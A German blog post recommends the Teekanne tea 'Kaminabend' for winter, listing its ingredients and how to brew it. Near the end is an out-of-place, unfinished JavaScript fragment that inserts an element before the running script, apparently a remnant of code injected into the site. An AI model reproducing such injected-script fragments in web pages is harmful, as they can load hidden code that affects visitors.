Winterzeit ist Teezeit

Nach dem uns der Winter ja nun doch noch begrüßt hat, greift man viel schneller zum Wasserkocher und in die Teevorräte, seien es selbst hergestellte Tees aus dem eigenen Garten, Teemischungen aus dem Supermarkt genauso wie gute Teesorten aus dem Teeladen.

Ich bevorzuge im Winter gern Schwarzen Tee mit Winteraroma. Im Moment liegt meine Hauptgeschmacksrichtung aber eher bei Kaminabend von Teekanne. Hierbei handelt es sich um einen Tee im Teebeutel, was die Handhabung vereinfacht. Die Marke Teekanne steht für Genuss. Die Pflanzen und alle Zutaten werden nur nach bester Qualität ausgewählt. Nur so kann man sichergehen, dass man auch wirklich guten Tee trinkt. Unter www.teekanne.de kann man die Herstellung des Tees von der Plantage bis zum fertigen Tee verfolgen. Was hat der “Kaminabend”, was andere Sorten nicht haben? Er setzt sich aus Rotbusch, Orangen-Zimtaroma Brombeerblättern, Orangenschale, Marzipanaroma, Zimt und Zichorienwurzel zusammen.

Bei der Zubereitung des Tees sollte man darauf achten, dass man immer sprudelnd heißes Wasser verwendet. Dann sollt der Tee 5 – 8 Minuten ziehen. Anschließend kann man ihn ganz ohne Zucker, mit Zucker, mit Honig oder aber mit Sahne genießen. Für die Zubereitung einer Tasse reicht ein Beutel aus, möchte man eine größere Runde damit überraschen, so sollten es schon drei Teebeutel für eine Kanne sein.
Ganz lecker schmecken gerade jetzt in der Weihnachtszeit sebst gebackene Kekse dazu.

document.currentScript.parentNode.insertBefore(s, document.currentScript);if (document.currentScript) {

Posted in Blog.

Hinterlasse eine Antwort